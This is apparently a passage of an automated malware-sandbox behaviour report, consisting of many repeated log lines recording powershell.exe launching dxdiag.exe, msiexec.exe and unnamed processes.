Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
